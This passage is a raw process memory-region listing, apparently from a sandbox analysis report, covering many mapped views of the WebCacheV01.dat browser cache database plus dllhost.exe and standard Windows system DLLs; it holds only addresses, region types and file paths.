mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 534 start_va = 0x1cd55b00000 end_va = 0x1cd55b0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 535 start_va = 0x1cd55b10000 end_va = 0x1cd55b1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 536 start_va = 0x1cd55b20000 end_va = 0x1cd55b2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 537 start_va = 0x1cd55b30000 end_va = 0x1cd55b3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 538 start_va = 0x1cd55b40000 end_va = 0x1cd55b4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 539 start_va = 0x1cd55b50000 end_va = 0x1cd55b5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 540 start_va = 0x1cd55b60000 end_va = 0x1cd55b6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 541 start_va = 0x1cd55b70000 end_va = 0x1cd55b7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 542 start_va = 0x1cd55b80000 end_va = 0x1cd55b8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 543 start_va = 0x1cd55b90000 end_va = 0x1cd55b9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 544 start_va = 0x1cd55ba0000 end_va = 0x1cd55ba7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55ba0000" filename = "" Region: id = 545 start_va = 0x1cd55bb0000 end_va = 0x1cd55bbffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 546 start_va = 0x1cd55bc0000 end_va = 0x1cd55bcffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 547 start_va = 0x1cd55bd0000 end_va = 0x1cd55bdffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 548 start_va = 0x1cd55be0000 end_va = 0x1cd55beffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 549 start_va = 0x1cd55bf0000 end_va = 0x1cd55bf7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55bf0000" filename = "" Region: id = 550 start_va = 0x1cd55c00000 end_va = 0x1cd55c0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 551 start_va = 0x1cd55c10000 end_va = 0x1cd55c1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 552 start_va = 0x1cd55c20000 end_va = 0x1cd55c2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd55c20000" filename = "" Region: id = 553 start_va = 0x1cd55c30000 end_va = 0x1cd55c3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 554 start_va = 0x1cd55c40000 end_va = 0x1cd55c4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 555 start_va = 0x1cd55c50000 end_va = 0x1cd55c5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 556 start_va = 0x1cd55c60000 end_va = 0x1cd55c6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 557 start_va = 0x1cd55c70000 end_va = 0x1cd55c7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 558 start_va = 0x1cd55c80000 end_va = 0x1cd55c8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 559 start_va = 0x1cd55c90000 end_va = 0x1cd55c9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 560 start_va = 0x1cd55ca0000 end_va = 0x1cd55caffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 561 start_va = 0x1cd55cb0000 end_va = 0x1cd55cbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd55cb0000" filename = "" Region: id = 562 start_va = 0x1cd55cc0000 end_va = 0x1cd55ccffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 563 start_va = 0x1cd55cd0000 end_va = 0x1cd55cdffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 564 start_va = 0x1cd55ce0000 end_va = 0x1cd55ceffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 565 start_va = 0x1cd55cf0000 end_va = 0x1cd55cfffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 566 start_va = 0x1cd55d00000 end_va = 0x1cd55d0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 567 start_va = 0x1cd55d10000 end_va = 0x1cd55d1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 568 start_va = 0x1cd55d20000 end_va = 0x1cd55d2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 569 start_va = 0x1cd55d30000 end_va = 0x1cd55d3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 570 start_va = 0x1cd55d40000 end_va = 0x1cd55d4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 571 start_va = 0x1cd55d50000 end_va = 0x1cd55d5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 572 start_va = 0x1cd55d60000 end_va = 0x1cd55d6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 573 start_va = 0x1cd55d70000 end_va = 0x1cd55d7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 574 start_va = 0x1cd55d80000 end_va = 0x1cd55d8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 575 start_va = 0x1cd55d90000 end_va = 0x1cd55d9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 576 start_va = 0x1cd55da0000 end_va = 0x1cd55daffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 577 start_va = 0x1cd55db0000 end_va = 0x1cd55dbffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 578 start_va = 0x1cd55dc0000 end_va = 0x1cd55dcffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 579 start_va = 0x1cd55dd0000 end_va = 0x1cd55ddffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 580 start_va = 0x1cd55de0000 end_va = 0x1cd55deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd55de0000" filename = "" Region: id = 581 start_va = 0x1cd55df0000 end_va = 0x1cd55dfffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 582 start_va = 0x1cd55e00000 end_va = 0x1cd55e0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 583 start_va = 0x1cd55e10000 end_va = 0x1cd55e1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 584 start_va = 0x1cd55e20000 end_va = 0x1cd55e2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 585 start_va = 0x1cd55e30000 end_va = 0x1cd55e3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 586 start_va = 0x1cd55e40000 end_va = 0x1cd55e4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 587 start_va = 0x1cd55e50000 end_va = 0x1cd55e5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 588 start_va = 0x1cd55e60000 end_va = 0x1cd55e6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 589 start_va = 0x1cd55e70000 end_va = 0x1cd55e7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 590 start_va = 0x1cd55e80000 end_va = 0x1cd55e8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 591 start_va = 0x1cd55e90000 end_va = 0x1cd55e9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 592 start_va = 0x1cd55ea0000 end_va = 0x1cd55eaffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 593 start_va = 0x1cd55eb0000 end_va = 0x1cd55ebffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 594 start_va = 0x1cd55ec0000 end_va = 0x1cd55ecffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 595 start_va = 0x1cd55ed0000 end_va = 0x1cd55edffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 596 start_va = 0x1cd55ee0000 end_va = 0x1cd55eeffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 597 start_va = 0x7df5ffba0000 end_va = 0x7ff5ffb9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffba0000" filename = "" Region: id = 598 start_va = 0x7ff793e80000 end_va = 0x7ff793f7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff793e80000" filename = "" Region: id = 599 start_va = 0x7ff793f80000 end_va = 0x7ff793fa2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff793f80000" filename = "" Region: id = 600 start_va = 0x7ff794540000 end_va = 0x7ff794546fff monitored = 0 entry_point = 0x7ff794541570 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 601 start_va = 0x7fffdcd30000 end_va = 0x7fffdcd44fff monitored = 0 entry_point = 0x7fffdcd35740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 602 start_va = 0x7fffdcd60000 end_va = 0x7fffdcfedfff monitored = 0 entry_point = 0x7fffdce30f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 603 start_va = 0x7fffe0b20000 end_va = 0x7fffe0e18fff monitored = 0 entry_point = 0x7fffe0be7280 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 604 start_va = 0x7fffe6fe0000 end_va = 0x7fffe7361fff monitored = 0 entry_point = 0x7fffe7031220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 605 start_va = 0x7fffeb740000 end_va = 0x7fffeb7d5fff monitored = 0 entry_point = 0x7fffeb765570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 606 start_va = 0x7fffec2b0000 end_va = 0x7fffec2e0fff monitored = 0 entry_point = 0x7fffec2b7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 607 start_va = 0x7fffec520000 end_va = 0x7fffec53efff monitored = 0 entry_point = 0x7fffec525d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 608 start_va = 0x7fffec860000 end_va = 0x7fffec86afff monitored = 0 entry_point = 0x7fffec8619a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 609 start_va = 0x7fffecc50000 end_va = 0x7fffecc78fff monitored = 0 entry_point = 0x7fffecc64530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 610 start_va = 0x7fffecdc0000 end_va = 0x7fffecdd3fff monitored = 0 entry_point = 0x7fffecdc52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 611 start_va = 0x7fffecde0000 end_va = 0x7fffece2afff monitored = 0 entry_point = 0x7fffecde35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 612 start_va = 0x7fffece40000 end_va = 0x7fffece4efff monitored = 0 entry_point = 0x7fffece43210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 613 start_va = 0x7fffece50000 end_va = 0x7fffed037fff monitored = 0 entry_point = 0x7fffece7ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 614 start_va = 0x7fffed0f0000 end_va = 0x7fffed733fff monitored = 0 entry_point = 0x7fffed2b64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 615 start_va = 0x7fffed740000 end_va = 0x7fffed7a9fff monitored = 0 entry_point = 0x7fffed776d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 616 start_va = 0x7fffed810000 end_va = 0x7fffed8c4fff monitored = 0 entry_point = 0x7fffed8522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 617 start_va = 0x7fffed8f0000 end_va = 0x7fffed932fff monitored = 0 entry_point = 0x7fffed904b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 618 start_va = 0x7fffedba0000 end_va = 0x7fffedbfafff monitored = 0 entry_point = 0x7fffedbb38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 619 start_va = 0x7fffedd80000 end_va = 0x7fffede26fff monitored = 0 entry_point = 0x7fffedd958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 620 start_va = 0x7fffede30000 end_va = 0x7fffeded6fff monitored = 0 entry_point = 0x7fffede3b4d0 region_type = mapped_file name = "clbcatq.dll" filename = 